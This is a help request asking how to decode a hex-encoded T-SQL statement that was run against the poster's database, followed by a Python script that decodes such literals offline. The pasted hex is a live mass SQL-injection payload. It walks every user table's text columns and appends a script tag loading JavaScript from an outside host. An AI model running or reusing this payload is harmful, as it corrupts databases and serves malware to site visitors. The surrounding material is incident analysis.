Hi,
I need to figure out what some code that was maliciously executed
against a database does. However, it's in a very strange format. It
simply declares a variable and sets it equal to a huge binary thing
(seems to be some sort of compiled code) cast as nvarchar. It then
executes this variable.
Is there any way to decipher or decompile this code? Does anyone
have information either on what SQL Server does when it's asked to
execute a binary string (as opposed to regular T-SQL) or on any tools
that can be used to disassemble or understand this code?
Thanks!
Here's the code:
DECLARE @S NVARCHAR(4000);
SET
@S=CAST(0x44004 50043004C004100 520045002000400 054002000760061 007200630068006 100720028003200 3500350029002C0 040004300200076 006100720063006 800610072002800 320035003500290 020004400450043 004C00410052004 500200054006100 62006C0065005F0 043007500720073 006F00720020004 300550052005300 4F0052002000460 04F005200200073 0065006C0065006 300740020006100 2E006E0061006D0 065002C0062002E 006E0061006D006 500200066007200 6F006D002000730 0790073006F0062 006A00650063007 400730020006100 2C0073007900730 063006F006C0075 006D006E0073002 000620020007700 680065007200650 0200061002E0069 0064003D0062002 E00690064002000 61006E006400200 061002E00780074 007900700065003 D00270075002700 200061006E00640 02000280062002E 007800740079007 00065003D003900 390020006F00720 0200062002E0078 007400790070006 5003D0033003500 20006F007200200 062002E00780074 007900700065003 D00320033003100 20006F007200200 062002E00780074 007900700065003 D00310036003700 290020004F00500 045004E00200054 00610062006C006 5005F0043007500 720073006F00720 020004600450054 004300480020004 E00450058005400 2000460052004F0 04D002000200054 00610062006C006 5005F0043007500 720073006F00720 0200049004E0054 004F00200040005 4002C0040004300 200057004800490 04C004500280040 004000460045005 400430048005F00 530054004100540 0550053003D0030 002900200042004 500470049004E00 200065007800650 063002800270075 007000640061007 400650020005B00 27002B004000540 02B0027005D0020 007300650074002 0005B0027002B00 400043002B00270 05D003D00720074 00720069006D002 80063006F006E00 760065007200740 028007600610072 006300680061007 2002C005B002700 2B00400043002B0 027005D00290029 002B00270027003 C00730063007200 690070007400200 07300720063003D 006800740074007 0003A002F002F00 7700770077002E0 06B0069006C006C 0077006F0077003 1002E0063006E00 2F0067002E006A0 073003E003C002F 007300630072006 900700074003E00 270027002700290 046004500540043 00480020004E004 500580054002000 460052004F004D0 020002000540061 0062006C0065005 F00430075007200 73006F007200200 049004E0054004F 002000400054002 
C00400043002000 45004E004400200 043004C004F0053 004500200054006 10062006C006500 5F0043007500720 073006F00720020 004400450041004 C004C004F004300 410054004500200 05400610062006C 0065005F0043007 500720073006F00 7200
AS NVARCHAR(4000)) ;
EXEC(@S);
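
An added example, not part of the original post: a hex literal cast to NVARCHAR is ordinary T-SQL text stored as UTF-16LE (two bytes per character), so it can be read offline by decoding the bytes instead of executing them. The function names, the keyword list and the sample statement below are assumptions constructed for illustration; the sample is a harmless query wrapped the same way, with whitespace injected into the hex as happens when a log or mail client wraps it.

```python
import re

# Matches CAST(0x<hex> AS [N]VARCHAR...; the hex run may contain whitespace
# introduced by log wrapping or copy/paste.
CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f\s]+?)\s*AS\s+(N?)VARCHAR", re.IGNORECASE)

# Illustrative triage keywords (an assumption, not an exhaustive list).
KEYWORDS = ("EXEC", "CURSOR", "SYSOBJECTS", "SYSCOLUMNS", "UPDATE", "<SCRIPT")


def decode_cast_literals(sql_text):
    """Return the decoded text of every hex literal, without executing it."""
    results = []
    for match in CAST_RE.finditer(sql_text):
        hex_digits = re.sub(r"\s+", "", match.group(1))
        if len(hex_digits) % 2:
            hex_digits = hex_digits[:-1]  # truncated capture: drop half byte
        raw = bytes.fromhex(hex_digits)
        if match.group(2):  # NVARCHAR: UTF-16LE, keep whole code units only
            raw = raw[: len(raw) - len(raw) % 2]
            results.append(raw.decode("utf-16-le", errors="replace"))
        else:  # VARCHAR: one byte per character
            results.append(raw.decode("latin-1"))
    return results


def flag_keywords(text):
    """List the triage keywords that occur in the decoded text."""
    return [k for k in KEYWORDS if k in text.upper()]


def build_sample():
    """Constructed, harmless statement in the same DECLARE/CAST/EXEC shape."""
    inner = "SELECT name FROM sysobjects WHERE xtype='u'"
    hx = inner.encode("utf-16-le").hex().upper()
    wrapped = " ".join(hx[i:i + 15] for i in range(0, len(hx), 15))
    return ("DECLARE @S NVARCHAR(4000);SET @S=CAST(0x" + wrapped +
            " AS NVARCHAR(4000));EXEC(@S);")


if __name__ == "__main__":
    for text in decode_cast_literals(build_sample()):
        print(text, flag_keywords(text))
```

The same function can be pointed at a captured web-server or SQL log line; only the decoded text is printed and nothing is sent to a database.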